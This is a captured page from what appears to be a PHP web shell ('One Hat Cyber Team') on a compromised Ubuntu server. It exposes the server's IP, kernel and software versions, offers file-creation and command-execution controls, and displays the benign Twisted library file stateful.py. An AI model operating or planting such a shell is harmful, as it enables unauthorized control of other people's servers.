⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.31
Server IP:
13.127.59.50
Server:
Linux ip-172-31-46-210 5.15.0-1033-aws #37~20.04.1-Ubuntu SMP Fri Mar 17 11:39:30 UTC 2023 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.3-4ubuntu2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
python3
/
dist-packages
/
twisted
/
protocols
/
View File Name :
stateful.py
# -*- test-case-name: twisted.test.test_stateful -*- # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. from twisted.internet import protocol from io import BytesIO class StatefulProtocol(protocol.Protocol): """A Protocol that stores state for you. state is a pair (function, num_bytes). When num_bytes bytes of data arrives from the network, function is called. It is expected to return the next state or None to keep same state. Initial state is returned by getInitialState (override it). """ _sful_data = None, None, 0 def makeConnection(self, transport): protocol.Protocol.makeConnection(self, transport) self._sful_data = self.getInitialState(), BytesIO(), 0 def getInitialState(self): raise NotImplementedError def dataReceived(self, data): state, buffer, offset = self._sful_data buffer.seek(0, 2) buffer.write(data) blen = buffer.tell() # how many bytes total is in the buffer buffer.seek(offset) while blen - offset >= state[1]: d = buffer.read(state[1]) offset += state[1] next = state[0](d) if self.transport.disconnecting: # XXX: argh stupid hack borrowed right from LineReceiver return # dataReceived won't be called again, so who cares about consistent state if next: state = next if offset != 0: b = buffer.read() buffer.seek(0) buffer.truncate() buffer.write(b) offset = 0 self._sful_data = state, buffer, offset